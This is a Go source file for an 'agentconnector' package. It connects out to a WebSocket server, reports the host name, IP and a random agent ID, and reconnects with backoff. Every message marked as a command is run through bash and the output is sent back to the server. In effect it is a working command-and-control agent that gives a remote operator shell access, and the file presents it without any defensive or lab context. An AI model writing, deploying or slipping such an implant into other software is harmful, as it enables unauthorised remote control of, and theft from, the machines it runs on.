package agentconnector

import (
	"encoding/json"
	"fmt"
	"log"
	"net/url"
	"os/exec"
	"os"
	"time"
	"math/rand"
	"math"
	"strconv"

	"github.com/gorilla/websocket"
)

type Agent struct {
	AgentName 		string `json:"agentName"`
	AgentID         string `json:"agentId"`
	AgentType       string `json:"agentType"`
	AgentIP         string `json:"agentIp"`
	InitialContact 	string `json:"initialContact"`
	LastContact     string `json:"lastContact"`
	AddPort 		string `json:"addPort"`
	HostName        string `json:"hostName"`
}

type Message struct {
	Type 	string `json:"type"`
	Payload string `json:"payload"`
}

var conn *websocket.Conn

func connectToWebSocket(webSocketAddr, agentName, agentId, agentIp, agentType, addPort, hostname string) error {
	wsURL := fmt.Sprintf(
		"ws://%s/data?agentName=%s&agentId=%s&IPv4Address=%s&agentType=%s&addPort=%s&hostname=%s",
		webSocketAddr,
		url.QueryEscape(agentName),
		url.QueryEscape(agentId),
		url.QueryEscape(agentIp),
		url.QueryEscape(agentType),
		url.QueryEscape(addPort),
		url.QueryEscape(hostname),
	)
	var err error
	for {
		conn, _, err = websocket.DefaultDialer.Dial(wsURL, nil)
		if err == nil {
			log.Println("WebSocket connection established")
			return nil
		}

		log.Printf("Failed to connect to WebSocket: %v. Retrying in 5 seconds...", err)
		time.Sleep(5 * time.Second)
	}
}

func reconnectToWebSocket(webSocketAddr, agentName, agentId, agentIp, agentType, addPort, hostname string) error {
	backoff := 2 * time.Second
	maxBackoff := 1 * time.Minute

	for {
		log.Println("Attempting to reconnect to WebSocket...")
		err := connectToWebSocket(webSocketAddr, agentName, agentId, agentIp, agentType, addPort, hostname)
		if err == nil {
			log.Println("Reconnection successful.")
			return nil
		}

		log.Printf("Reconnection failed: %v", err)

		time.Sleep(backoff)
		backoff *= 2
		if backoff > maxBackoff {
			backoff = maxBackoff
		}
	}
}

func listenForCommands(webSocketAddr, agentName, agentId, agentIp, agentType, addPort, hostname string) {
	defer conn.Close()

	for {
		_, rawMessage, err := conn.ReadMessage()
		if err != nil {
			log.Printf("Connection lost: %v", err)
			if reconnectErr := reconnectToWebSocket(webSocketAddr, agentName, agentId, agentIp, agentType, addPort, hostname); reconnectErr != nil {
				log.Printf("Critical error during reconnection: %v", reconnectErr)
				}
			continue
		}

		var message Message
		if err := json.Unmarshal(rawMessage, &message); err != nil {
			log.Printf("Error unmarshalling message: %v", err)
			continue
		}

		if message.Type != "command" {
			log.Printf("Ignoring non-command message: %v", message)
			continue
		}

		command := message.Payload
		log.Printf("Received command: %s", command)

		cmd := exec.Command("bash", "-c", command)
		output, err := cmd.CombinedOutput()

		response := Message{
			Type: "response",
			Payload: string(output),
		}

		if err != nil {
			response.Payload += fmt.Sprintf("\n Error executing command: %v", err)
		}

		responseBytes, _ := json.Marshal(response)
		if err := conn.WriteMessage(websocket.TextMessage, responseBytes); err != nil {
			log.Printf("Error sending output: %v", err)
			break
		}

		log.Printf("Output sent to server.")
	}
}

func randomInt(length int) int {
	rand.New(rand.NewSource(time.Now().UnixNano()))
	min := int(math.Pow10(length-1))
	max := int(math.Pow10(length)) -1
	return rand.Intn(max-min+1) + min

}

func StartServer(addPort, webSocketAddr, agentIp string){

	agentName := "Agent-001"
	agentId := strconv.Itoa(randomInt(8))
	agentType := "Interactive"
	hostname, _ := os.Hostname()

	log.Printf("AgentId: %s", agentId)

	if err := connectToWebSocket(webSocketAddr, agentName, agentId, agentIp, agentType, addPort, hostname); err != nil {
		log.Fatalf("Websocket connection failed: %v", err)
	}

	listenForCommands(webSocketAddr, agentName, agentId, agentIp, agentType, addPort, hostname)
}
